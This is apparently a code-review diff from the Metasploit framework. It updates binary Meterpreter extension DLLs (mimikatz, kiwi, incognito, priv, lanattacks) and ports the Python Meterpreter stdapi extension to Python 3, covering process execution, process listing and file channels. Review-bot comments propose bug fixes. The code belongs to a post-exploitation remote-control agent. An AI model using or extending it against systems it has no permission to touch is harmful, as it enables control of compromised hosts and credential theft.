z$eI!1j|N^@4(-4!73obf4=p8fic}KQLQCf*dt*h(+1#uwN$o5Jv%}1j9KOs@DZNRV zW8Km6lZAnDU1y3~ele`v2qQ`MvuPFCmnMPwlDZ%sEa_~7iJ_OnuU4ee=u$=Y-boeN zcPBw3<XqVU+{TybU+K!<X|Rb8g)MKzpK4-UXMpt;-SS1Odc4CHD-VOH!oJ^8fRu{j zzbl?qDt11qcuA>nmuv$AuFQryDSu~D{{FI-PSTwtSLqyiR&TiU*qi4c4RyHf4f14# z{aQMDq$vahP4cMTl#65nUr{sok(>#E8?K^K(bpuJk5afMQY*^>F#Nf)I@X<i0&eoJ z?Id2B-dr&TE|#)8y$y0e#YnZ=UR7bQ%7kPB>v@W3m)<6!iu6|BLbbe^gq)&QxP)|) zzLeub;G#nFwJxU*Eaq@hu>ZMoQZzAfdv1M7`z&xjxe_#1F1q0<?h$QnBXsTxonxVM z*_>8VC1sx|I}%!EZ&QtYxt<I{?!%x@_6hNP*s3StS|^okgB4}vIOiw_gpo5~KZ%or z(fT2mvShN}Y`FIMike_O;Jor!azliBFnBLnZw;&$7VEaRf@-rtHMgO{UgPjZ%vM$j zYBWo#SK)m{R$3ECR@w&2s-&K<$aC<HsVJ%`fK!nJ4nYwoV@QMA;sGxI%E@3A>1*V# zpsPb(3~>g+Uxj@Q%rFyX$dy-;5HF>-5<9@aoxuvdI}sJzh!y-xm+Y-0%4$Qw0-&dO zI&4)YS-!INxgBet43-0JVEK|7v`|YfJMq=BId>`IuabJw|M)BM)ADa1Z!0@mNY-j^ z_Gi%H5W(^!yX@!s5)SkV&XIc($X}Gw?@ou~6C|NbpF=IBU-~z5_HRZ7RgE}7*Vnb? 
zq0g7)kU!#-wb$Egroh3fNUw319Cqi|y7TLDWqmMll_roYUQ<y{`X~l;$af%t_yrE< zJSB87@=L@*bqO$t^iVzx&H-sndF9m1BoE{u*kdVMUDnEmRfpg@-G0=JUl6L04ae$> z5+{+E-+1I|K#n{AYk4$qzM@NTnjjp@li=d(KR5DN?;-to6h=d&19Nm3=Pr&gT0#au z-hro0uKYZnX3UHXhqrb^O(B^%5c+546og8*<q}+H9D>f{n?@5_hliLnXb#RdjSX5s z+J)mCrc6Kl1S7En&c##2Nq%WpyjPs)haclW^W(^Y=b81WKi*_s(|Z;q57_A$Qqc6N zM{}gxWlL35QHW2F*Wz?b28zZTECb;hbJQZDYuIP$$6Qq&gW->?)Zk^U?**VC_}dXK zv;*gkd<O;N2P01-(R+Lphv@ss`2OfPl!|-V`=J5YY>z{0@ihB9^dDSjPeFrl;Fy77 z1;fCM5Dv%-5pHJKG-jG>A;?Is?^E_y)AOfu<e7w*uMdTH7ZnO8jjx>wPZ7Bh1pjos z3|yW&sO5@W`#<tyez|nC<rI0mX1cT6At2?HpDgMrzX^2(J*T@_xdJRM9lw5@g!$my z@^eL9<QH+w*jO|bi(^GpfESMy)jz`x8`@sR2gg>JGl22;wUZ?rzrF|hmX$D&ycUPZ ztiQJ9B`G_KuPr}!98qCwYg3GNW^pIE2QEvUrQQP%5EyMczLBZ}!zH8*L<jNsv^W%l z=chSCKZomnJq7m~O0Mz#nC3w!4lf=*6&=Or$HUDPw~ZeeH8qjw&_dGdIXOdN$YShx z(u4%kd_rs}MWp?R^pC-K%Y+%-Z^H+Lf>?R18EzQl^(+s@-P1LRpOZ^6JfXI?1j}~7 z?kL%+6lAws!r{(E8puQNQ|Sq44PKodjf(NE^yp3vBNQ*rKkB`l-Y*DMe>gd~yX(ko zin;8hn0`-F%#>#-#tQrx;H9T1=Ey>dd4Cqg?4Cz4cji;f5a7drj|6@i@NX=jnBpfW zrgSdF94nxhhtE*VPmfc~^*IzX4EWi=j{|-Z@SZ0r<_nm^JCkBg!yFXwx~D1cin&)1 zT8W=@=A(3Py)zoo>x*#nlM{O_Sqw^~hq@78n{s_G*|9k%sCs)tgLgu~B1D%Jdu!*< zK<K_V{^^+rt@FP8OaP5u$K?w@>@{>hM9VgJNpsm>sE9n*68!J72(RPWeTY_<dIO%z z2#ovu3kZh?mJ`bwQ^90;(wLXPmm`f)MLisH6<$~z9{Tz}ZI<K8;`pJnKp?GH1D!rA zg<nba4%wlI)^%_rl^!dBllAy=aU$x9gI*Y-{<#4r<K;`(@Ip-FXTU&=QI{Q6mDMw; zZo9hZ!yI|Lcm4~F2wm`wUUGyc-Iks}c6?^(VX)6Cml=)so^%bOUH$8zbJ@~l^11B! zWI5c=Y86&12l`pF!kXoKN0r7Y3Y#Kd^RuHBcC_5+XHyk6RX$1BmzPevRg4%i_%yki zND8{hJHQ9?NEVec@PcJgXcb<$EEj2U)3Pri%Izt;M7v(Y70Z90xw@9jcU)C;L((<3 zA_kuCOF<;*nt<Uiy893z$uE({Sa|je^2|paZu;Bg$QdB<=`KM#cOTMAwkU!|0yX$b zd4Iku>67D&sQeW%TlaRRnJvp7AoyTe*u^3L_8HW<`w+pFm48dY>?;PL{dnezVmhGC z`~8YjL3C9sey?H>Db7@Eg2KD-wPz4r`oP=tx}DBeZ>AVu(;xM4r=f}>j$Eh9t^}0b zS1%fJ=UrdIT2fmn)gL6aW!F`ULd%*00#5i6%40S`w}gr)QV-<@U@Md1*A$?aHsKfF z7(}Z#<E?KbkmBSUF$rX(iZsdx^{qh7K$n2N25JDR13HX5;k0nlQ1X$1<AIWaQa0nc zc(%D}3#s_yJD6@VKp5<iV)y-uB@xB8K?i6-8duf;z67M&f`it?(N$aUpf!o4$Xvq? 
zAT3~wDNxJ=asn*`Dh4VAS_!m%3x01+Y7hU!`$2FRr~#<Si`F&=gbdpSd*FLsB@gi4 zTo;Vc1N_HZENb;8zC9VCW^c**-85a9>m9mL*BKq~&f4Clg3sO4c3+{<1#H_l0PXS4 z+1DQ-$?N_wNrlY#qXQ$+WZZVZO;^@=%c_kuU3?sW`tdBf^f>N+a2XWd_Ya06Qv1oF zZ2@REp8MHB_(IgTc8zO#Ip`vdVZ=Z~Gk7(8Q<&hFgo}aZ4vEPxi4p@-IwTM@NUs<% zaCC>Hr(Y5;2BvmMRDMZ<7&xIr^4oHymq84i*&%6q%r7#FfwMbAU-~5}VxY4_a@a2! zEe1Z-A=%-Vq>6zHJ0$D;k_lp9VTWV|e(gxCYo1@O5(ASv<k^0SS`1`6B%}NiRt%id zA>sTItr$41LlQ?M9bY`9A~pO$Vfi!Q++-6~P(?mZwU?1HRKBZ}jNA&P%lCY^+^h(q z<V&O!<O>QLFMpww3Gy+eOq4%S%4GQ?rDWw@N~x9KRmvFoKT2tk*D9r1u7I+vF2(nJ zio8q_jh0_j%2augQcjQyTncc=PblSN`7x!OB2QAvY4SLwoGFh~%Gt6>DV?%LDW8&u zDCI)ApHddey_K?9?yi(C$ste@9S)R|c;3DY7U)kHw-vY&9vzf?Rl%zWyr{rR0?#Ut zBntVM0!f094=Qj2fqN9VnZPOqRuTA?0=E(PngYp#MJ`j|VFHU4SWDp3%UndEI)a~2 z#3u;M1*j<9K)5ueVn2aa1%6E+ufRqE6BT%gz&;9WBCxvxn+Xh7piE%<%Vff{1l}gl zb)c2ttBUv*ffp5cm%y_MY$NcP0^12Zs6g@oM&6@96@gU%6`je4Jo!zfB9uT$fy!6# zQU!(+X^{e>$fHj#P_XjReTD*+KORh0pz_CqGzBVuU9c)p`4Z17kR_ufDo{&c9|al+ z?5;pFfx!w)A+WuaSYR}Pw@ZB)ex*|h`?FFrfxt!uItctifs+aRT!B*vtXAMO0(UBK zCV^Y<bH|RM8f-lN1^N{S*RMbleyx5Y67Uc8m1r4WaN<QY-23Z^ul%9z)E8>x_Dbi! z4@F+@+@|4(j&JjNewxt<^}&Dq`a+)(w<sp<2E~*Bodt@$Nij)4ML^Zwik2*d4Bnqw z;r8^ccjOH<qBjJ2C)~W#34M)I?(d8>{6#T;J){^-JH@;L)ClwokmgT{$^Xk6^5AV6 z6?)%oPeC-(*?aBJ2n50W&%YqSP6<Oe@r@XL82Y~_$)~!)mz{(PC#i?B71+v`;MX>w zhOP)Nfh-9_R6&-6;?x^41E3}3q=`_NfwVx$KnXxGK=2-8LZM}6oJyeNBO@;adI_i! 
zD&|3&WJraQC944bKeA*SbO4R+LW@c@{7MFz%pe>LX%dRWHHn_h0f-w&8o&_Spn$*7 zFf~B6Kqr9C0yP4)K>PP0O9GU9s&1emPz(^;t$LCQU8B*D)uv!HF#x?<{b~sMMTM$7 zpz{~#VzrflKMbSyJx_N>BT#{7Pj~b-I^!AF1D%_8m`6-~;7W+v+sttJSq`8+a25PE zS_rBHgcY;~P?Qy#tW%n7fZvyuzMBDMDov^YeGH@22W|sYWvMO>M@u`?tN7}+IMf_8 zbVo8`+JSP0BIXq!8EF16#4HE826Pf=@NmS$0^RX+8iY=x(bX3Qp?Lx5Qne)sCDO=S zJ$ESDN7Ja6rx%N^qn_0P96Cg!$2_0$Xen8$7S)8Ky`Dc((Vz789M8Qpw7XN?&A)sV z>2=rdd3KFM1JGH|`EjV^zy!q7{a$|st}a_CCbN-ZcKry?h>jn}0gBlkgP8cH>PZ<W zD2VQw=6P%~`nAi!LbxdHgBNQN#ayk<%toJe4V?ELU{Azsr0-(hMlqYA`oB<Kt<IZ` ze$=A<)yB6_wJK?S5k)lssY@xU5`t_gyg8Z9h=NZJ6g>VZc-T{wKzno1>b?;kb|X^J z1-Tw!BO20WDLnf71>#<Ctf^_95gSolhyz3rJA6}eJ#TJA!@BI6L^1n-$O`UyzS@X} zqwhRu6N;vT-t)w6LcP&Zj}h3QsY~I^F7-UN3B}TeSCkSpdEVND;?z@D`TKj~H=(Gm z8(xPK3p0=rx4o{6(KU4SKeFi6p01lwZ+gR8Wf1iz@BY&}JX8fHPy><PWW4a8v+u)2 z^nK6UFtM<CzrSV<lna0!&9k>-zDIo44u8A%x5MhT6CHYn*6)KiAJE?;_uK&UybF{< zM2~(x@C@04p6Ig7OED{ei1>=<tu1J{y8d5kMbU2^@cg<3#iHY$PVb=T(6Of|<}o1B zUa^Dv*M@(%@SyA8QcU}|ezP6&xZgo>^z@6$qUdQ?Jg44)k!n2GLCk#G6aGBj@v{=J zXERteV0t9-90C(~GPk0*fKAcJGj$W{6R<u8dDa6^TVnma6q`kI*@#I8N_jL8lv{I< zCus}n>rqvqWP12mkERL@LABNSRj8UK{}56g`98WH${fn{>pgo8Vy>Df2L2^vL-o%6 zsIkYup%IAr|5Npj6X;xEECrqhp9hs6`2UGg0$7j{(&u{K{u14okT@Qa15h5&lRz&3 zxq;pS+79$F&`F^0fUX1G2kJC|VtN4$1~LMr0p$UKo<pnAS@b&Xx^L-Wjkfl+O4eVk z0k#<1$2OQdg`!AK{tx>X`wG{>b<+&iJgvE?ku~=;A$&AHm><uV@UQdl@G;uqT8nnI zc8gZ8E6{zX`>(EDH$iwtI4PVL9te89L!YOgp)b>K)F04)um4@&#lRWT4RZ`D4O<Nd z4VMjVF2i`^GUMyUPmGt0SB*B)Q>J%JJ54uCcTEpWlo%w2irvL1F;+|v2aAGe7srX& z;$z|*u|O;mUlhy5SH-pB+v2<84)G)Lpm<C?C0-D}7k?3d6@M2Wz=I*g9AWNl9$+3~ z)|pLayLp^B+x(b$j=9*p$^45s%;Ji*7%WpQ^DGN2Z(H_TKDLBdds<_yY1SO;M(bzR z%huc0INLbeeA}zGPi?1c=WXBHnr#nkl!KxsE4viPhOraaEcPIKlkLZi;GX1GaBH{* z?j}cTx@*4GT-Myw7<el`j(?edi~k+$(_M%WrV4_7k$#>2giF7~;5D8zUN^QGshO1W z4Q>w$BQK<=HBeM*4rxBq9M#loPHWC+&clEgH9u;8)?CxHz`%Dje`p?Re3}40nD5Mo z@jduR*q%7PKR<|1;)nA*|26*yzgl};drv!5C+h6FDY`|%8^X`RLxIviV{jQ<v8H5` z%XH9mO^h=qn1`94FfTU0Y?jOo<}2pTmVuU+EUPUaSh`xx)_pdrl%mK@IEkCVJ;!b3 
zKHxs&YPr+gSKJ*gK=X@c0MGIQ|Eji0`?l^2-OEC~a9QZ7FV?TtzoT!^p9c^4Nq=9j zHgq?{83r4ShE;}7U54)rX{MQ`b*5dWL#8^@P1Ez@Ch=qOh}a<hEdD7*nd3nz-aOL0 z(7fJ!&aAdXgE~K2f~=X=WmeiY+&0g)z*b{BXQL`XGjQ4<Hk8$|4%W#QvSsWx_E%Qq z?A$zV8MmI>$$iY7;lAaXxa(YJO}M7F#ucxzYQ}4_Gz&CKG%ssbY2Mas)$G!IqWK(5 z-Uz#Q1B^`ZfqYLsozLc-{BwLUzmi`Ads)Tr=Ii)h_;T$A?RM=)+GE<&+DqDp+HSgN zU0+?YZlZ3oZl-RIZn>^O_q$FlL<zaV0^tQ=t*}9ON7ySI5Kar1T!Jjz6z&P#^wIh> z{WSdt`oo5!hRLQ9Q>^%!`Hnf-GT3s#ddC`S>tTzw#oH2WiMCAJV%u8V2HR#^m2I1C zr){roKUe@(zuCV%G^++1Fl;#cB3sUGX5VLbvU}P6>;=}xa-4xPb1B?tE|r_WIXKs3 zZX;L4Z3ENn<$mIC@<G~e+7#`(+TGd%+Oyi5T9vM=Zjg@CS#_!4JTK^$>MrQ+=puw9 zSj!E;CydkY(I3>;>aXdO4H|>qU^9GcXg2(Ah%jC>^|BakV?o{RM7h0w<<h|XLp0a; zEFoW*B`kIcWkReW(=gZYl%dM7*Ko@aW*lvtVXQLlFzz!3nXINvhzRFQznP-MM9~5t zjMK#|F;DzN{9K%5dEBzjQe}}XcP*4P%-Y+UVx4N8XMNu4vaYfovL3a5ZB^Tb*+$yZ zZPRVDZH2a%Y|Ct`ZR>4Yz-9++wcs_bOSUVvKW$VkMXdwp>B9D8V_AVsV<)oN>@;=` zTfi=4i`f!zC5f$M-()wkTiNaGKK1~6n5|<^vS-+D*-PvdaI>52@9du}&8azti{PTU z{#+tAj1xE!qCy&%!A<6-agT!|F5n8e7r-4~;VQVbF79n^GnjuD=j9H;VLHxz$(`rE z<9_0<a;@B5?mp+^f;FKKN_uPJGy^n4H5!dUlcKRJPCG?2T{BlRU-PWy1<g{;a&X_( z8jog^rb@G2^P#31-1r#8jqe~@+<-Wtg1~L%ALEzs2l+GnRlWr_+tpdiX*0Cjw4!d5 z?lE1l?x0R5ScFXBDd8(Pz1jK&aDL|+<{L^3$wtv=H|{ak8taW0jI9u`e8z63BvYBG zpQsUS;uGQuQ4&4kRyexX#hc=NG0fc0Y%q^7r<<pkUFN;!6Xtv7hvs;T&LUbyS@I#~ zzU;DK%e$6p%Sp>c%YQ9COE+tOtIj&vI@elkebu@F{_Tu93j|xEft5vq#&2oA(dO!& z)P1FE)V1jP3xkE>f=&>H5kjgkQOE(enk~#176~s3%Y;{jH-$|?m9RtDFMKL|Df|E~ z`-d=BKVM&>Uk{G^k>2%$VIH_%nW4dO-f$6;k;9m0oMS97zG>WGe8*UA{LFaF_?7V+ z<3(c=1ZlHrgsIe2ZhFmxO&d&GOuJ2;#R!oVP2zU(iufN`$_~qymdoId-K>$Y6y9pI zrdlUjXIST0=Ubn%z5uTIinYRut?R8-)(@;+m-VpqOY2o@tMzy5Lu;Uov1LKBS#H~H zJ7K#3spbYbI!zQsK2KASYI?GRAiAZnso<V7;B+5gkFpKyEw&Fg2b^jncL5Slgl3&4 zlwZZ4;?MK9`B_?4H$&&teX6V1RSA29&xLP<b^0y(U4{dOcZ{x9<L|~krp2(5-%P{A z@sL<a7DzMCGVeC$S!P;RSSl=kS|Y4=vK6-|$_xeON;P-+2YkGCpw_M(uf3{^HzXJm z4ao-9pfwl_X2UR}(b&tRGrem15K{63(E`grBz;h&>_ZM|27x0_)MRVg2l5+)&9Fn; zgq;u)_X{<`M*XMyn|cFm$v)#X<61ECPVpB{pKs7;6?|0K>6!Bl8sw6|v2TDo41hE@ 
zk6)o(rCq1(3vsFyvTGl~1}W~Wa9d~-;`GUSPH)pct#?EI`B5Kah%pR@a5DvhO^u=5 z5NKqKaYn20SyQp8$;605!2&bE20HT&^C9yY^9A$wW^6fSX@Z1PYW>7o4_jrnHMwl$ ze&mGZG_dE`Z`h0MPwX#jixL9v!=*_DL7*$wor~gPxPII~PS5S;&O$mV)ppm#>UQe( z>uPmpbW_1gw+r$5k%n=G-;B#ml@Rj>!ciI_ejzrCvF7)Pt>JqI3q=qc#jfHjA@Qu^ zH}I~_kbSoCJNdo*e!hlZZ}`oiGu|}qg}*;hDTs=Pq6Qpepe9EXq`N2V*MFhEr2kW| zGrVD-;3Eea_e)Knj?u;ICh1<(y{dapcK~8~UpP98VKYuc){fPW)Tinn*B9wuf$aUc V{ww{rdTOSB(FxUEE~A_3{{w=DH8=nO diff --git a/data/meterpreter/ext_server_incognito.x64.dll b/data/meterpreter/ext_server_incognito.x64.dll index d919cc4810bba46b9348ead110daf43b093ad30c..76e2634b33911ebfe68796507d7fca72476164ca 100755 GIT binary patch delta 38 scmZoTz}9epZNdv?_4^YhzV>Bi$zy7^X54Pg$apgqB(_~Vo$;jw04(wjzW@LL delta 38 scmZoTz}9epZNdxYb^kghzV>BiUdz~Q&A8o~k@03KNNl@!I^#<V07*#@H~;_u diff --git a/data/meterpreter/ext_server_incognito.x86.dll b/data/meterpreter/ext_server_incognito.x86.dll index 3dc39f853286a219e8626598ba1536b9e7208e7f..3767662ee55925304461034062e85eb0eb72d808 100755 GIT binary patch delta 39 tcmZo@VQXk%TfoS??%ssS%#6Ow9)}s5gBiC6GcsNb1PN|e4`#fn2LKbg4kZ8p delta 39 tcmZo@VQXk%TfoSi@ULSsGovr_944mbV8-pijEolpL4w=WgBfq?0RRHm4NU+5 diff --git a/data/meterpreter/ext_server_kiwi.x64.dll b/data/meterpreter/ext_server_kiwi.x64.dll index a95d1c2f32645f2734b953bc3affd0a91ec20653..6344153b8220f30d2d2c9fd80985217731e8c5fc 100755 GIT binary patch delta 47 zcmZozBiOJ;a03S;bMO5LlermvnNH7aj$&+&VgzBP?NN-(yB>h#wu?Vvepw6vmRJ$z delta 47 zcmZozBiOJ;a03S;^Ot`elermvnL2MYM=`cXF@iAD_9#Z?T@OHV+r=L-zbpm-tVj~z diff --git a/data/meterpreter/ext_server_kiwi.x86.dll b/data/meterpreter/ext_server_kiwi.x86.dll index 5348692063509599b42584d72f41e6a4fe199a32..501034aefff5532cfe44716296b1a7b9e5b6c67e 100755 GIT binary patch delta 48 zcmZo@;BRQ)-yp!q%yEChWMM{M=I4)?o0A#alNmvnX?rpw^T%kA<o57b=9NhRf!7c^ delta 48 zcmZo@;BRQ)-yp!qJm+7>WMM{M=KqQ;&B=`I$&4V(v^|-T`C~Lla(j3z^U5Rujx7-A 
diff --git a/data/meterpreter/ext_server_lanattacks.x64.dll b/data/meterpreter/ext_server_lanattacks.x64.dll index 69577b3010f29eca617374e9685d7650c9e1d431..c1e174c7860c61f0d5b313d3bdfef76cbc58528c 100755 GIT binary patch delta 46 ycmZqp!rSnLcfto|z55d;e)eVN_F`#vW^8w61YxG_&Wy|tr9g7q)n%A(#sUDQnh<;d delta 46 ycmZqp!rSnLcftqeE&n<ue)eVN=wxnoW^8w61YxG_&Wy|tr9g7q)n%A(#sUDzUlH*D diff --git a/data/meterpreter/ext_server_lanattacks.x86.dll b/data/meterpreter/ext_server_lanattacks.x86.dll index 0ea7c89b886e227badf78f4c4226eef0903aae03..cc78481a50f008f887a0af5564951ab52be73e36 100755 GIT binary patch delta 41 vcmZo@;cjT*p74Wt%e@H`fBQ1+7H{@qZ1-Yh-0sE5w5uE>yq&$0>8A$(Y?2V} delta 41 vcmZo@;cjT*p74V?^<T%t-@Z(|;mux*?Ou$G+r1c>c9nyKx3gC={qz6;SfvmW diff --git a/data/meterpreter/ext_server_mimikatz.x64.dll b/data/meterpreter/ext_server_mimikatz.x64.dll index 85f80e20518a3425691fc4089a26126c937a5310..dbbf07b3cffb8b1b4e20004c6fb396071be02650 100755 GIT binary patch delta 92 zcmZqZP;BT>+`z%eTy}rLWNt=ZCdG5jQH<?Tj3CSe#LPg<0>rG_qZrxdsfZbxSQ!}t g5d#!>mF6iZn6~q&v2Ev5V|Qx@8MHloE&Ix80E4<1!T<mO delta 92 zcmZqZP;BT>+`z%e{PbVPWNt=ZCb3`5QH<?Tj3CSe#LPg<0>rG_qZrxdsfZbvTbY_$ i85=M_fp21^g0W#cpBmeCJ~ei?c922a!`HH}oCW~C_ZkBL diff --git a/data/meterpreter/ext_server_mimikatz.x86.dll b/data/meterpreter/ext_server_mimikatz.x86.dll index 7448559c11f1dd3d4c07a4e2f9ab801a212643ed..d722b30e70d28a03647f489aed2d4ea91b79faf4 100755 GIT binary patch delta 75 zcmZp8A<^(cVgV!b$9oedGc)=!RiritF}4RWf-n;hGj9)KWU0C!WN2b#XlZ3=!T<zb YrFjYprrYmbWcl_4q;dQ8ZLFHL0KWMedH?_b delta 75 zcmZp8A<^(cVgVy_-@lH@%#6NF`=&PsF}4RWf-n;hGj9)KWU0C!WMFP(YG!3%!2krl YiIob*hTHF5Wcl_4q;dQ8ZLFHL0L2{|YXATM diff --git a/data/meterpreter/ext_server_priv.x64.dll b/data/meterpreter/ext_server_priv.x64.dll index 9c91f1f7e492493415620db4772dd4ba8ab8c224..edbbc7bf7260f51ce052aca88842ae6f2c6e8316 100755 GIT binary patch delta 37 rcmZozz|pXPW5N$+;rkON{`O^J&uR8z-0sE5m~{*!w0-+=Mo$j_A*T-c delta 37 rcmZozz|pXPW5N&SMgKY`{`O@OUES=(xZR79G3yveX#4i#jGi6<Kba7c 
diff --git a/data/meterpreter/ext_server_priv.x86.dll b/data/meterpreter/ext_server_priv.x86.dll index 266ece2e297a97ae9264f74da5316add25167ebc..22755d0d5835a6a48374f3fcfa0b1009445867ea 100755 GIT binary patch delta 38 scmZqp!`ASJZNdlUS@$MP{Orp-`5I%hGvjt=M#hVcAhGS@&5SRt0B2AUV*mgE delta 38 scmZqp!`ASJZNdlUkbfN$Kl?I&7iDU8X58+~$at|4B(`0=nen9+09i8-s{jB1 diff --git a/data/meterpreter/ext_server_stdapi.jar b/data/meterpreter/ext_server_stdapi.jar index bef5cee0140fd78c4db9c9ac32eb29b3d7778bc5..b6a01cac095c0f8e799987555ea70dea3ae1b18e 100644 GIT binary patch delta 174 zcmV;f08#(`t^)q90+2NX8;47DkvT7apwL|vH)6q+TN#>>2HPY|(vP>dwTNyW^FH%t zN_6%?G3gs|wBF@v1(_6w&NfD$&2#2E$nNX?A|`!!<!TrPXenU~jkgIZ-%4?0!bIld z7Xho9REa$~wSf$_Qk=#_Za$$e9u0A>rnUc;X(SFjBgAAdSXh!$6kOG|C;oj4d2MLy cqWT(ANbv@fK>-@G3<2<g1RIA-bh3kf6pHCi8~^|S delta 174 zcmV;f08#(`t^)q90+2NXG)|x%kvT7afY4nlZp4Bsw=y&%4Yo;0rXO!_YZ2W%=6&YP zROsx366+hqWWCGP1~Mti-nK@c&2!-g$nM+CDzYwLxf;h2I$}(r^_HRbofOAN$Yef# z5wLDZRXC7SJIG)!#c5)4%L#q)Xej1tUi)vEM~WdX2#E~_3u{t}BG!!^DE__+ytXv; cNqr3|q<909K>-@G3<2<g1T;>d9<qae6sf{Z*8l(j diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index ae9cab6cb8..ed7e58701a 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py @@ -48,6 +48,24 @@ try: except ImportError: has_winreg = False +try: + import winreg + has_winreg = True +except ImportError: + has_winreg = (has_winreg or False) + +if sys.version_info[0] < 3: + is_str = lambda obj: issubclass(obj.__class__, str) + is_bytes = lambda obj: issubclass(obj.__class__, str) + bytes = lambda *args: str(*args[:1]) + NULL_BYTE = '\x00' +else: + is_str = lambda obj: issubclass(obj.__class__, __builtins__['str']) + is_bytes = lambda obj: issubclass(obj.__class__, bytes) + str = lambda x: __builtins__['str'](x, 'UTF-8') + NULL_BYTE = bytes('\x00', 'UTF-8') + long = int + if has_ctypes: # # Windows Structures 
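Review bot: On the Python 3 branch of the @@ -48 hunk, `str` is rebound for the whole module to a strict UTF-8 decode, so every later `str(x)` raises UnicodeDecodeError on bytes that are not valid UTF-8 and TypeError on a value that is already text. The hunks at @@ -693, @@ -725 and @@ -793 pass it data the agent does not control (`/proc/<pid>/cmdline`, `ps` output, the names filled in by `LookupAccountSidA`), so a single unusual process or account name would abort the whole listing. I would keep the builtin names intact and add a separately named helper, or at least decode leniently: `str = lambda x: __builtins__['str'](x, 'UTF-8', 'replace')`. `__builtins__` is a dict only when the file is not executed as `__main__`, so the subscript form presumably depends on how the extension is loaded; a comment saying so would help.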
@@ -498,11 +516,12 @@ def get_stat_buffer(path): blocks = si.st_blocks st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink) st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev) - st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime) + st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime)) st_buf += struct.pack('<II', blksize, blocks) return st_buf def netlink_request(req_type): + import select # See RFC 3549 NLM_F_REQUEST = 0x0001 NLM_F_ROOT = 0x0100 @@ -513,17 +532,25 @@ def netlink_request(req_type): sock.bind((os.getpid(), 0)) seq = int(time.time()) nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC) - sfd = os.fdopen(sock.fileno(), 'w+b') - sfd.write(nlmsg) + sock.send(nlmsg) responses = [] - response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) + if not len(select.select([sock.fileno()], [], [], 0.5)[0]): + return responses + raw_response_data = sock.recv(0xfffff) + response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) + raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] while response.type != NLMSG_DONE: if response.type == NLMSG_ERROR: break - response_data = sfd.read(response.len - 16) + response_data = raw_response_data[:(response.len - 16)] responses.append(response_data) - response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR))) - sfd.close() + raw_response_data = raw_response_data[len(response_data):] + if not len(raw_response_data): + if not len(select.select([sock.fileno()], [], [], 0.5)[0]): + break + raw_response_data = sock.recv(0xfffff) + response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)]) + raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):] sock.close() return responses 
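Review bot: The rewritten `'<IIII'` line in get_stat_buffer still passes `si.st_size` unclamped, so a file of 4 GiB or more should make `struct.pack` raise instead of returning a stat buffer. The `st_ino` field two lines above is already clamped with `min(0xffff, si.st_ino)`; the matching change here is `min(0xffffffff, si.st_size)` in place of `si.st_size`, accepting that the reported size saturates. The start of get_stat_buffer is outside the hunk.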
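Review bot: The new early `return responses` after the first `select.select` timeout leaves netlink_request without closing `sock`, which the normal path does with `sock.close()` at the end. Close it on that path as well by putting `sock.close()` on the line before `return responses`. The slices that follow also trust `response.len` from the received header; a value below 16 gives a negative slice bound, so `if response.len < 16: break` ahead of the slice would be a cheap guard. The opening lines of the function are outside the hunk.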
@@ -559,7 +586,7 @@ def channel_open_stdapi_fs_file(request, response): else: fmode = 'rb' file_h = open(fpath, fmode) - channel_id = meterpreter.add_channel(file_h) + channel_id = meterpreter.add_channel(MeterpreterFile(file_h)) response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id) return ERROR_SUCCESS, response @@ -675,6 +702,7 @@ def stdapi_sys_process_execute(request, response): proc_h.stderr = open(os.devnull, 'rb') else: proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + proc_h.echo_protection = True proc_h.start() else: proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) @@ -693,15 +721,15 @@ def stdapi_sys_process_getpid(request, response): def stdapi_sys_process_get_processes_via_proc(request, response): for pid in os.listdir('/proc'): - pgroup = '' + pgroup = bytes() if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit(): continue - cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ') - status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read() + cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb') + cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8'))) + status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read()) status_data = map(lambda x: x.split('\t',1), status_data.split('\n')) - status_data = filter(lambda x: len(x) == 2, status_data) status = {} - for k, v in status_data: + for k, v in filter(lambda x: len(x) == 2, status_data): status[k[:-1]] = v.strip() ppid = status.get('PPid') uid = status.get('Uid').split('\t', 1)[0] 
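Review bot: In the @@ -693 hunk the two `open()` calls under `/proc/<pid>` are unguarded and the new `cmdline_file` handle is never closed. A process that exits between `os.listdir('/proc')` and the open raises out of the loop and loses the entire process list, and the loop keeps one descriptor open per pid until garbage collection. Skipping the vanished pid and closing both files explicitly fixes both; the function continues past the end of the hunk.

```python
for pid in os.listdir('/proc'):
    # … unchanged: pgroup setup and pid filtering …
    try:
        cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb')
        cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8')))
        cmdline_file.close()
        status_file = open(os.path.join('/proc', pid, 'status'), 'rb')
        status_data = str(status_file.read())
        status_file.close()
    except (IOError, OSError):
        # the process exited, or is unreadable, between listdir and open
        continue
    # … unchanged: status parsing …
```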
